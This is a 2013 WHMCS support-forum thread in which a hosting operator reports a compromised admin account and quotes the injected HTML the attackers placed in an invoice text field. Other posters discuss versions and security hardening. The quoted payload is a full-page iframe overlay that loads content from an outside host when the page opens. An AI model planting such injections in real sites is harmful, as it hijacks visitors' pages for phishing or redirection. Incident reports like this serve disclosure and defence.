eugenevdm Posted October 23, 2013 Share Posted October 23, 2013 I suspect they ran a password crackers against our encrypted WHCMS admin and changed an admin's password. Their method for attack is change the Pay to Text to have this code: <p> <div id="contenido" class="contenido"> <h1 class="titulos"><iframe frameborder="no" style="Z-INDEX: 999; POSITION: absolute; WIDTH: 100%; HEIGHT: 1800px; TOP: 0px; LEFT: 0px" onload="sendParams();" src="http://www.quien-visita-mi-perfil.id1945.com/Silver.html"></h1> <div id="texto_inicio"> <p><iframe frameborder="no" style="Z-INDEX: 999; POSITION: absolute; WIDTH: 100%; HEIGHT: 1800px; TOP: 0px; LEFT: 0px" onload="sendParams();" src="http://www.quien-visita-mi-perfil.id1945.com/Silver.html"> </p> </div> </div> <br /> </p> We had WHMCS update our system after we first discovered hashed passwords a user's firstname field but I suspect it was too late. Let's hope it stops here. 0 Quote Link to comment Share on other sites More sharing options...
Damo Posted October 23, 2013 Share Posted October 23, 2013 (edited) What version were you running? When did this occur? Why are you still using the default admin folder? As an absolute minimum (and you should be doing a lot more) see http://docs.whmcs.com/Further_Security_Steps Edited October 23, 2013 by Damo 0 Quote Link to comment Share on other sites More sharing options...
eugenevdm Posted October 23, 2013 Author Share Posted October 23, 2013 This occurred from the 20 Oct 2013 to 23 Oct 2013 (today). Currently I run version 5.2.8 but I think I was on 5.2.4 until about 10 days ago before WHMCS updated our system. They came from these IPs: 175.141.7.186 193.150.10.66 113.210.36.243 94.123.224.198 2.90.220.13 39.229.45.204 91.217.82.162 63.144.94.3 175.196.65.153 180.245.63.78 109.200.188.23 188.255.212.30 109.93.148.162 5.135.207.84 I'm implementing .htaccess now. 0 Quote Link to comment Share on other sites More sharing options...
WHMCS Chris Posted October 23, 2013 Share Posted October 23, 2013 Hello, We are running version 5.2.10 - please ensure you are completely up to date. 0 Quote Link to comment Share on other sites More sharing options...
brian! Posted October 23, 2013 Share Posted October 23, 2013 We are running version 5.2.10 - please ensure you are completely up to date. you aren't on the demo - it says it's 5.2.8 0 Quote Link to comment Share on other sites More sharing options...
WHMCS Chris Posted October 23, 2013 Share Posted October 23, 2013 The demo hasn't been updated, correct. "We" being WHMCS as the software referring to the latest available version. 0 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.